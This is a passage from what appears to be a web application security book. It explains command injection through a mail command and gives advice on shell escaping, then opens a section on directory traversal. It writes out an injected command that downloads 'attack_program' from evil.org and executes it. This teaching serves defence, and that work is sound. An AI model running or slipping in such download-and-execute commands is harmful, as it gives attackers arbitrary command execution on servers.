org/attack_program; ./attack_program #
Adding this puzzle piece to the puzzle creates the following shell command:
mail --help; wget http://evil.org/attack_program;
./attack_program # s 'some subject' < /tmp/email_body
This is equivalent to this:
mail --help; wget http://evil.org/attack_program; ./attack_program
This runs mail --help and then downloads attack_program from evil.org and
executes it, allowing the attacker to perform arbitrary commands on the vulnerable
web site.
Preventing Command Injection
Preventing command injection is similar to preventing SQL injection. The developer
must escape the user input appropriately before running a command with that input. It
may seem like escaping semicolon (;) to backslash-semicolon (\;) would fix the problem.
However, the attacker could use double-ampersand (&&) or possibly double-bar (||)
instead of the semicolon. The escaping routine is heavily dependent on the shell executing
the command. So developers should use an escape routine for the shell command rather
than creating their own routine.
Directory Traversal Attacks
Popularity: 9
Simplicity: 9
Impact: 8
Risk Rating: 8
Attackers use directory traversal attacks to read arbitrary files on web servers, such
as SSL private keys and password files.
Pages:
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73